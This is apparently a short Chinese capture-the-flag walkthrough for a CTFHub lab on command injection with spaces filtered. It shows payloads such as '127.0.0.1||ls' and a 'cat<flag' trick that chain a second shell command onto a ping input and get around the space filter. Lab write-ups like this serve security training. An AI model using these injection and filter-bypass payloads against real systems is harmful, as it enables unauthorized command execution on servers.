打开靶机

ctfhub技能树—RCE—过滤空格

查看页面信息

ctfhub技能树—RCE—过滤空格

开始尝试注入

127.0.0.1 || ls

ctfhub技能树—RCE—过滤空格

尝试绕过

127.0.0.1||ls

ctfhub技能树—RCE—过滤空格

使用cat命令查看flag

127.0.0.11||cat<flag_10872536812766.php

ctfhub技能树—RCE—过滤空格

拿到flag

绕过空格过滤方法很多,详情请自行百度搜索

相关文章: